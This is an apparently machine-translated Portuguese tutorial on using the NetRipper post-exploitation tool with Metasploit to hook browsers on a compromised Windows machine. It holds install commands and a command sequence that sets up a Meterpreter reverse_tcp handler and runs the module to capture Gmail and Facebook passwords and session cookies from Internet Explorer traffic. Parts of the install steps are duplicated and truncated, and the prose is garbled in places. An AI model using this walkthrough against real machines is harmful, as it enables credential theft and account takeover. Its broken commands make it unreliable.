Um aplicativo chamado NetRipper que é uma ferramenta que permite o tráfego de pós-exploração da rede de intercepção e, por exemplo, é capaz de capturar criptografia tanto plana e tráfego. Em outras palavras, podemos hackear navegadores máquina e roubar credenciais do Gmail, Facebook, Twitter, Outlook, uma vez que estamos em um nível inferior, antes que os HSTS fazer o seu jogo. Também pode remover cookies de sessão, por isso, se a vítima é um serviço que conecta a cookie persistente poderia subtrair. A ferramenta tem uma versão do Windows com um .EXE binário ou, uma versão para PowerShell e outra versão em a forma módulo Metasploit.que me chamou a atenção foi o PowerShell, pois poderia ser usado com o script Empire PowerShell e use -o como pós-operação e a versão do Metasploit, como com sessão Meterpreter poderia fazer grandes coisas.. Para o caso de Metasploit Instalando NetRipper no Metasploit Como você pode ler na ferramenta Github, a instalação é básica, basta baixar os arquivos, siga os passos abaixo:
cd NetRipper
cd Metasploit
cp netripper.rb /usr/share/metasploit-framework/modules/ post/windows/gather/
mkdir /usr/share/metasploit-framework/modules/ post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/ post/windows/gather/netripper/
cd ../Release
cp DLL.dll /usr/share/metasploit framework/modules/post/windows/gather/ne tripper/DLL.dll
cp netripper.rb /usr/share/metasploit-framework/modules/
mkdir /usr/share/metasploit-framework/modules/
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/
cd ../Release
cp DLL.dll /usr/share/metasploit framework/modules/post/windows/gather/ne
PoC: Hakeando navegadores e obtendo contra senhas do Gmail e Facebook
A prova de conceito começou no estado em que o auditor ou o atacante já alcançaram sessão Meterpreter. Sem perder a sessão de executar o comando de fundo e, em seguida, carregar o módulo com a instrução de uso netripper post / windows / recolher / netripper. Como você pode ver na foto, o módulo oferece várias opções através de seus atributos.
Há vários atributos que precisamos configurar. O primeiro, que é necessário , é a identificação da sessão. Temos para indicar para qual sessão que deseja executar a pós-exploração módulo. Nesta prova de conceito que usamos a sessão
msfconsole
use multi/handler
set LHOST 192.168.0.102
set LPORT 4444
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
background
use post/windows/gather/netripper
show options
set PROCESSNAMES iexplore.exe
set SESSION 1
exploit
session -1
O módulo irá listar os processos e manterá os processos que se encaixam os valores no atributo PROCESSNAMES, como você pode ver na imagem.
Neste momento, vemos que temos 2 processos hackeados da Internet Explorer. No seguinte caminho da máquina comprometida começará a gravar arquivos de texto com as solicitações HTTP que o navegador envia imediatamente antes de ser criptografado.
Se a vítima visita o Facebook e os registros ou apenas ter uma sessão aberta, podemos roubar o cookie de sessão. Na imagem seguinte vemos como roubar a senha do Facebook, tudo que você tem a fazer é apresentar o arquivo acima. Como nota explicativa, com Meterpreter você pode baixar arquivos de texto com esta informação NetRipper gerado na máquina comprometida. O comando que usamos é baixar [fonte caminho] [caminho de destino].
NetRipper é uma potente ferramenta integrada com o framework de Metasploit,o que torna um processo complexo que pode levar tempo em uma auditoria pode fazê-lo rapidamente